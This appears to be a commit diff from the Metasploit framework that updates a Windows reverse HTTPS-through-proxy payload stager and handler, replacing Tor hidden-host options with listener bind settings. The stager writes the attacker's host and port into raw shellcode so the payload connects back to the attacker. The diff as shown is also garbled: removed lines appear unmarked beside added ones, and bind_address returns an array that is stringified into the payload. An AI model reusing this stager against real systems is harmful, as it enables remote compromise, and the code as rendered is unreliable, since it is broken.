Update reverse_https_proxy stager/handler

This change updates the proxy handler code, which for some reason was ommitted in the orginal commits. This now uses the same mechanism as the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.
2013-11-11 22:21:05 +10:00 · 2013-11-11 22:21:05 +10:00 · 063da8a22e
parent 12810580d6
commit 063da8a22e
2 changed files with 36 additions and 12 deletions
--- a/lib/msf/core/handler/reverse_https_proxy.rb
+++ b/lib/msf/core/handler/reverse_https_proxy.rb
@ -42,13 +42,17 @@ module ReverseHttpsProxy
        OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
        OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
        OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
        OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
        OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
        OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
        OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
        OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
 			], Msf::Handler::ReverseHttpsProxy)
    register_advanced_options(
      [
        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
        OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
      ], Msf::Handler::ReverseHttpsProxy)
  end
 end
--- a/modules/payloads/stagers/windows/reverse_https_proxy.rb
+++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb
@ -134,11 +134,7 @@ module Metasploit3
    p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V")
    # patch the LPORT
-    unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
+    lport = bind_port
      lport = datastore['HIDDENPORT']
    else
      lport = datastore['LPORT']
    end
    lportloc = p.index("\x68\x5c\x11\x00\x00")  # PUSH DWORD 4444
    p[lportloc+1] = [lport.to_i].pack('V')[0]
@ -148,11 +144,7 @@ module Metasploit3
    # append LHOST and return payload
-    unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
+    lhost = bind_address
      lhost = datastore['HIDDENHOST']
    else
      lhost = datastore['LHOST']
    end
    p + lhost.to_s + "\x00"
  end
@ -163,5 +155,33 @@ module Metasploit3
  def wfs_delay
    20
  end
 protected
  def bind_port
    port = datastore['ReverseListenerBindPort'].to_i
    port > 0 ? port : datastore['LPORT'].to_i
  end
  def bind_address
    # Switch to IPv6 ANY address if the LHOST is also IPv6
    addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
    # First attempt to bind LHOST. If that fails, the user probably has
    # something else listening on that interface. Try again with ANY_ADDR.
    any = (addr.length == 4) ? "0.0.0.0" : "::0"
    addrs = [ Rex::Socket.addr_ntoa(addr), any  ]
    if not datastore['ReverseListenerBindAddress'].to_s.empty?
      # Only try to bind to this specific interface
      addrs = [ datastore['ReverseListenerBindAddress'] ]
      # Pick the right "any" address if either wildcard is used
      addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
    end
    addrs
  end
 end